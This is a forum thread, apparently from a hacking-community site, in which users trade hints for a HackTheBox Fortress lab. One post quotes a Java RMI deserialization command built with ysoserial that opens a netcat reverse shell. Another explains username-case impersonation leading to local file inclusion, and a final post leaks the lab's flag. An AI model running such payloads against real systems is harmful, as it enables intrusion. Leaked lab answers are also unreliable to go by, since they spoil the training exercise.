Possibly Related Threads…

yivador274 · Jan 08, 2024, 09:18 AM

Hi.

Could anybody give some hints to take 2nd flag - AcedDC?
I know it is about deserialization in monitoring srv. But i can't to craft right msg for that. (i already know token)

yivador274 · Jan 08, 2024, 10:29 AM

(Jan 08, 2024, 09:58 AM)ElBakhaw Wrote: I don't remember 100% but I have this :

senddata()

proxychains -q java -jar rmg-4.4.1-jar-with-dependencies.jar serial 172.22.1.250 1099 --yso /opt/ysoserial.jar --bound-name monitoring --signature 'String sendData(String dummy,Object dummy2)' CommonsCollections6 'netcat ip port -e /bin/bash'

thx a lot. i did it.

yivador274 · Jan 08, 2024, 02:19 PM

now I'am stuck after vpn connection. There is a very laggy squid. It's about some exploit on squid or not?

yivador274 · (This post was last modified: Jan 08, 2024, 04:07 PM by yivador274.)

Any hints for squid part?

yivador274 · Jan 09, 2024, 11:13 AM

thx. I already did it yesterday.
so my previous question not actual already )

fl00d777 · Jan 16, 2024, 09:42 PM

Stuck on first flag. I think I need to become ellonmusk, but how? Have access to _profiler, looking for clues. can someone give me a hint plz?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

peRd1 · (This post was last modified: Jan 18, 2024, 11:35 PM by peRd1.)

(Jan 16, 2024, 09:42 PM)fl00d777 Wrote: Stuck on first flag. I think I need to become ellonmusk, but how? Have access to _profiler, looking for clues. can someone give me a hint plz?

Yes you are right, you need to become elonmusk, on code analysis this fact stands out that new users cannot be elonmusk.

However, this string comparison also yields the vulnerabiliy, you can register as EloNMusK for example. This way you can also login with your new user and impersonate that user.

Then grab the admincontroller and analyze its code, you can see how ti downloads files... this way you can achieve LFI and leverage this for further enumeration.

And finally the flag.

toutorrent · Feb 12, 2024, 11:36 AM

Hi,

Stuck after the second flag.

Done successfully the attack with java.
But stuck on the machine, couldn't find any interesting file or program.

can someone give me a nudge ?

monkeythefirst · Feb 14, 2024, 09:41 AM

writeup:

https://gatogamer1155.github.io/fortress/synacktiv/

to open:

SYNACKTIV{S3Linux_1s_w@y_bett3r}

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] CPTS 12 FLAGS	pulsebreaker	68	1,916	3 hours ago Last Post: VictorPipeau
	[FREE] HackTheBox Dante - complete writeup written by Tamarisk	Tamarisk	601	91,514	3 hours ago Last Post: VictorPipeau
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	371	92,790	4 hours ago Last Post: phannguyenbaouy1
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	21	2,604	8 hours ago Last Post: popoler
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,246	Yesterday, 02:10 PM Last Post: kkkato